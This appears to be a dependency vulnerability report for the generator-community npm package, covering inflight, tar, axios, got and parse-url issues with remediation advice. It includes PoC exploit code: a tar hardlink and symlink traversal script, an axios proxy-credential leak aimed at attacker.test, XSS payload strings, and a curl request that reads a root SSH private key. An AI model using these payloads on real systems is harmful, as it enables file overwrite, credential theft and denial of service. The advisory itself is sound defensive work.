  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 rimraf@3.0.2 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 globby@8.0.2 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 mem-fs-editor@4.0.3 globby@7.1.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 shelljs@0.8.5 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 shelljs@0.8.5 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 @npmcli/run-script@6.0.2 node-gyp@9.4.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 rimraf@3.0.2 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 rimraf@3.0.2 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 @npmcli/run-script@6.0.2 node-gyp@9.4.1 rimraf@3.0.2 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 @npmcli/run-script@6.0.2 node-gyp@9.4.1 make-fetch-happen@10.2.1 cacache@16.1.3 glob@8.1.0 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 @npmcli/run-script@6.0.2 node-gyp@9.4.1 make-fetch-happen@10.2.1 cacache@16.1.3 rimraf@3.0.2 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 @npmcli/run-script@6.0.2 node-gyp@9.4.1 make-fetch-happen@10.2.1 cacache@16.1.3 @npmcli/move-file@2.0.1 rimraf@3.0.2 glob@7.2.3 inflight@1.0.6

Overview

Affected versions of this package are vulnerable to Missing Release of Resource after Effective Lifetime via the makeres function due to improperly deleting keys from the reqs object after execution of callbacks. This behavior causes the keys to remain in the reqs object, which leads to resource exhaustion.

Exploiting this vulnerability results in crashing the node process or in the application crash.

Note: This library is not maintained, and currently, there is no fix for this issue. To overcome this vulnerability, several dependent packages have eliminated the use of this library.

To trigger the memory leak, an attacker would need to have the ability to execute or influence the asynchronous operations that use the inflight module within the application. This typically requires access to the internal workings of the server or application, which is not commonly exposed to remote users. Therefore, “Attack vector” is marked as “Local”.

PoC

const inflight = require('inflight');

function testInflight() {
  let i = 0;
  function scheduleNext() {
    let key = `key-${i++}`;
    const callback = () => {
    };
    for (let j = 0; j < 1000000; j++) {
      inflight(key, callback);
    }

    setImmediate(scheduleNext);
  }


  if (i % 100 === 0) {
    console.log(process.memoryUsage());
  }

  scheduleNext();
}

testInflight();

Remediation

There is no fixed version for inflight.

References

medium severity

Directory Traversal

  • Vulnerable module: tar
  • Introduced through: generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 @npmcli/run-script@6.0.2 node-gyp@9.4.1 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 npm-registry-fetch@14.0.5 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 sigstore@1.9.0 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 @npmcli/run-script@6.0.2 node-gyp@9.4.1 make-fetch-happen@10.2.1 cacache@16.1.3 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 sigstore@1.9.0 @sigstore/sign@1.0.0 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 sigstore@1.9.0 @sigstore/tuf@1.0.3 tuf-js@1.1.7 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Directory Traversal via processing of hardlinks. An attacker can read or overwrite arbitrary files on the file system by crafting a malicious TAR archive that bypasses path traversal protections during extraction.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.7 or higher.

References

medium severity
new

Insertion of Sensitive Information Into Sent Data

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data in the setProxy function. An attacker can obtain proxy credentials by inducing a redirect from an HTTP request sent through an authenticated proxy to an HTTPS endpoint where no proxy applies, causing the proxy credentials to be forwarded to the final origin.

Note:

This is only exploitable if the application is running in Node.js with the HTTP adapter, an initial HTTP request uses an authenticated proxy, redirects are enabled, the redirect target does not use a proxy, and the redirect shape is not stripped by confidential-header handling.

Workaround

This vulnerability can be mitigated by setting maxRedirects: 0 and handling redirects manually, ensuring Proxy-Authorization is not copied to requests that are not sent through the proxy. Avoid using reusable authenticated HTTP proxy credentials for requests to untrusted origins. If exposure is suspected, rotate the proxy credential.

PoC

process.env.HTTP_PROXY = 'http://user:pass@127.0.0.1:8080';
delete process.env.HTTPS_PROXY;

// The local HTTP proxy receives this request and returns:
// HTTP/1.1 302 Found
// Location: https://attacker.test/final
await axios.get('http://attacker.test/start');

Remediation

Upgrade axios to version 0.32.0, 1.16.0 or higher.

References

medium severity

Directory Traversal

  • Vulnerable module: tar
  • Introduced through: generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 @npmcli/run-script@6.0.2 node-gyp@9.4.1 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 npm-registry-fetch@14.0.5 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 sigstore@1.9.0 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 @npmcli/run-script@6.0.2 node-gyp@9.4.1 make-fetch-happen@10.2.1 cacache@16.1.3 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 sigstore@1.9.0 @sigstore/sign@1.0.0 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 sigstore@1.9.0 @sigstore/tuf@1.0.3 tuf-js@1.1.7 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Directory Traversal via insufficient sanitization of the linkpath parameter during archive extraction. An attacker can overwrite arbitrary files or create malicious symbolic links by crafting a tar archive with hardlink or symlink entries that resolve outside the intended extraction directory.

PoC

const fs = require('fs')
const path = require('path')
const tar = require('tar')

const out = path.resolve('out_repro')
const secret = path.resolve('secret.txt')
const tarFile = path.resolve('exploit.tar')
const targetSym = '/etc/passwd'

// Cleanup & Setup
try { fs.rmSync(out, {recursive:true, force:true}); fs.unlinkSync(secret) } catch {}
fs.mkdirSync(out)
fs.writeFileSync(secret, 'ORIGINAL_DATA')

// 1. Craft malicious Link header (Hardlink to absolute local file)
const h1 = new tar.Header({
  path: 'exploit_hard',
  type: 'Link',
  size: 0,
  linkpath: secret 
})
h1.encode()

// 2. Craft malicious Symlink header (Symlink to /etc/passwd)
const h2 = new tar.Header({
  path: 'exploit_sym',
  type: 'SymbolicLink',
  size: 0,
  linkpath: targetSym 
})
h2.encode()

// Write binary tar
fs.writeFileSync(tarFile, Buffer.concat([ h1.block, h2.block, Buffer.alloc(1024) ]))

console.log('[*] Extracting malicious tarball...')

// 3. Extract with default secure settings
tar.x({
  cwd: out,
  file: tarFile,
  preservePaths: false
}).then(() => {
  console.log('[*] Verifying payload...')

  // Test Hardlink Overwrite
  try {
    fs.writeFileSync(path.join(out, 'exploit_hard'), 'OVERWRITTEN')
    
    if (fs.readFileSync(secret, 'utf8') === 'OVERWRITTEN') {
      console.log('[+] VULN CONFIRMED: Hardlink overwrite successful')
    } else {
      console.log('[-] Hardlink failed')
    }
  } catch (e) {}

  // Test Symlink Poisoning
  try {
    if (fs.readlinkSync(path.join(out, 'exploit_sym')) === targetSym) {
      console.log('[+] VULN CONFIRMED: Symlink points to absolute path')
    } else {
      console.log('[-] Symlink failed')
    }
  } catch (e) {}
})

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.3 or higher.

References

medium severity

Open Redirect

  • Vulnerable module: got
  • Introduced through: update-notifier@2.2.0, generator-license@5.1.0 and others

Detailed paths

  • Introduced through: generator-community@commonality/generator-community update-notifier@2.2.0 latest-version@3.1.0 package-json@4.0.1 got@6.7.1
    Remediation: Upgrade to update-notifier@6.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-license@5.1.0 yeoman-generator@1.1.1 github-username@3.0.0 gh-got@5.0.0 got@6.7.1
    Remediation: Upgrade to generator-license@5.6.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 yeoman-generator@1.1.1 github-username@3.0.0 gh-got@5.0.0 got@6.7.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 github-username@3.0.0 gh-got@5.0.0 got@6.7.1
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 github-username@3.0.0 gh-got@5.0.0 got@6.7.1
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 github-username@3.0.0 gh-got@5.0.0 got@6.7.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 github-username@3.0.0 gh-got@5.0.0 got@6.7.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 got@8.3.2
  • Introduced through: generator-community@commonality/generator-community inquirer-npm-name@2.0.0 npm-name@3.2.0 got@8.3.2
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 inquirer-npm-name@2.0.0 npm-name@3.2.0 got@8.3.2
  • Introduced through: generator-community@commonality/generator-community github-username@4.1.0 gh-got@6.0.0 got@7.1.0
    Remediation: Upgrade to github-username@6.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 github-username@4.1.0 gh-got@6.0.0 got@7.1.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 github-username@4.1.0 gh-got@6.0.0 got@7.1.0
    Remediation: Upgrade to yeoman-generator@5.0.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 github-username@4.1.0 gh-got@6.0.0 got@7.1.0

Overview

Affected versions of this package are vulnerable to Open Redirect due to missing verification of requested URLs. It allowed a victim to be redirected to a UNIX socket.

Remediation

Upgrade got to version 11.8.5, 12.1.0 or higher.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: parse-url
  • Introduced through: git-url-parse@7.0.1

Detailed paths

  • Introduced through: generator-community@commonality/generator-community git-url-parse@7.0.1 git-up@2.1.0 parse-url@3.0.2
    Remediation: Upgrade to git-url-parse@11.0.0.

Overview

parse-url is an An advanced url parser supporting git urls too.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) due to improper sanitization of special characters for ASCII that start with \x and also for all Unicodes start with \u.

PoC:

const http = require("http");
const parseUrl = require("parse-url");
const url =  parseUrl('jav\u000Dascript://%0aalert(1)');
console.log(url)
const server = http.createServer((request, response) => {
    response.writeHead(200);
    if (url.scheme !== "javascript" && url.scheme !== null) {
        response.end("<a href=\'" + url.href + "\'>Wowww!</a>" );
    }
    else{
        response.end("Nooo!");
    }
});
server.listen(80, "127.0.0.1",function(){
    console.log("http://"+this.address().address+":"+this.address().port);
});

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade parse-url to version 6.0.1 or higher.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: parse-url
  • Introduced through: git-url-parse@7.0.1

Detailed paths

  • Introduced through: generator-community@commonality/generator-community git-url-parse@7.0.1 git-up@2.1.0 parse-url@3.0.2
    Remediation: Upgrade to git-url-parse@11.0.0.

Overview

parse-url is an An advanced url parser supporting git urls too.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) due to improper sanitization of special ASCII characters that start with \r\r or \r. This vulnerability exists due to an incomplete fix for CVE-2022-2217.

PoC:

const http = require("http");
const parseUrl = require("parse-url");
const url =  parseUrl('jav\r\r\rascript://%0aalert(1)');
console.log(url)
const server = http.createServer((request, response) => {
    response.writeHead(200);
    if (url.scheme !== "javascript" && url.scheme !== null) {
        response.end("<a href=\'" + url.href + "\'>Wowww!</a>" );
    }
    else{
        response.end("Nooo!");
    }
});
server.listen(80, "127.0.0.1",function(){
    console.log("http://"+this.address().address+":"+this.address().port);
});

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade parse-url to version 6.0.1 or higher.

References

medium severity

Insertion of Sensitive Information Into Sent Data

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
